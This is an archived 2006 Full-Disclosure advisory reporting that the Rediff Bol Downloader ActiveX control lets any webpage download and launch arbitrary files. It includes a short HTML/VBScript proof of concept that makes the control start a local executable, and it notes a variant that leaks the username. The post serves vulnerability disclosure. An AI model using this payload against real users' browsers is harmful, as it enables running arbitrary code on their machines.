lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 31 Dec 2006 13:20:17 +0530
From: "gregory_panakkal" <gregory_panakkal@...tmail.fm>
To: full-disclosure@...ts.grok.org.uk
Subject: Rediff Bol Downloader ActiveX Allows Downloading
 and Spawning Arbitary Files

Rediff Bol Downloader ActiveX Allows Downloading and Spawning Arbitary
Files 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Affected Program : Rediff Bol Download ActiveX
ActiveX (OCX) Control that downloads the Rediff Bol Messenger
setup and spawns it.


Related URL : http://messenger.rediff.com/newbol/ 


Discovered by : Gregory R. Panakkal 


Vulnerability Description : 

Rediff Bol Downloader ActiveX control allows any webpage
to download and spawn file. These file can be of any type.
No filtering is done.

IE Displays an alert, if the code points to a executable file on the
internet. But execution of local files displays no alert.


Tested On :
* IE 7.0.5730.11 (WinXP SP2)
* IE 6.0.2900.2180 (WinXP SP2)


Proof Of Concept: 

[OBJECT id="rboldwn" WIDTH=445 HEIGHT=40
classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03"
codebase="http://imdownloads.rediff.com/newbol/Bol.CAB"]
[/OBJECT]

[script language="vbscript"]
 rboldwn.url = "file://C:/WINNT/Notepad.exe"
 rboldwn.fontsize = 14
 rboldwn.barcolor = EE4E00
 rboldwn.start = "start"
[/script]


A variation of this, allows downloading a HTML File that can
disclose the path to the local temporary internet files folder.
It can disclose the Logged in User's username. A typical path to
Temporary Internet Files folder is..
C:\Documents and Settings\<username>\Local Settings\Temporary Internet
Files


Online Info + Demo: 
http://www.infogreg.com/security/misc/rediff-bol-downloader-allows-downloading-and-spawning-arbitary-files.html 


rgds, 
Gregory R. Panakkal 
http://www.infogreg.com/ 


-- 
  gregory_panakkal
  gregory_panakkal@...tmail.fm

-- 
http://www.fastmail.fm - Email service worth paying for. Try it for free

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ